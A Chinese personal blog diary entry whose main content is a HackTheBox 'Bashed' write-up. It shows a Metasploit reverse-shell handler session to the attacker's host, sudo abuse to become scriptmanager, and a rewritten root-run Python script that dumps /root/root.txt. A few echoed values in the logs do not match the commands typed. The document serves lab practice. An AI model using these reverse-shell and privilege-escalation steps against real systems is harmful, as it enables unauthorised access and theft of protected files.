2021/3/31的修行

字数统计: 535字   |   阅读时长≈ 2分

稍稍 有点 疲倦了

……今天 早点 睡吧

1. 上班

2. 继续学习《设计模式之禅》

这种水平就可以写书吗……

……

看来我的书的日程要提前下了

3. 塑形课

4. 修改博客样式

5. HackTheBox Retired 【Bashed】打掉 (提权看了题解)

上接29日。

5.1 提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.16.4
LHOST => 10.10.14.18
msf6 exploit(multi/handler) > set LPORT 2468
LPORT => 2468
msf6 exploit(multi/handler) > set ExitOnSession true
ExitOnSession => false
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.16.4:2468 
[*] Sending stage (39282 bytes) to 10.10.10.68
[*] Meterpreter session 3 opened (10.10.16.4:2468 -> 10.10.10.68:56894) at 2021-04-01 02:09:26 +0800
[*] Sending stage (39282 bytes) to 10.10.10.68
[*] Meterpreter session 4 opened (10.10.16.4:2468 -> 10.10.10.68:56896) at 2021-04-01 02:09:28 +0800
1
2
3
4
5
6
meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > sysinfo
Computer    : bashed
OS          : Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64
Meterpreter : php/linux
1
2
3
4
meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.10.68 - Collecting local exploits for php/linux...
[-] 10.10.10.68 - No suggestions available.

啊这

emmmmmmm

看题解看题解

5.2 看题解

Exploring directories on the target quickly reveals /scripts, which is owned by the scriptmanager
user. The command sudo -l reveals that the www-data user can run any command as
scriptmanager. Running the command sudo -u scriptmanager bash -i will spawn a bash shell
and give full read/write access to /scripts

1
2
3
4
5
6
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
1
2
3
4
5
6
7
8
9
10
sudo -u scriptmanager bash -i
bash: cannot set terminal process group (761): Inappropriate ioctl for device
bash: no job control in this shell
scriptmanager@bashed:/var/www/html/uploads$ cd /scripts
cd /scripts
scriptmanager@bashed:/scripts$ ls
ls
test.py
test.txt
scriptmanager@bashed:/scripts$

/scripts/test.py

1
2
3
f = open("test.txt", "w")
f.write("testing 123!")
f.close

删掉test.py

新建一个test.py

用它本地的vi盲打也行,wget也行。……在这个shell里用vi坦白说还挺恶心的,不过 想做总能做

/scripts/test.py (改)

1
2
3
4
5
6
7
f2 = open("/root/root.txt", "r")
s = f2.read()
f2.close()
f = open("test2.txt", "w")
f.write(s)
f.close()
print(s)

为啥要拿root权限嘛

直接拿到flag 它不香嘛

(手动狗头)

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

自称为XenoAmess的方术师。

为了得到【意义】而进行各种各样的修行。

Hack The Box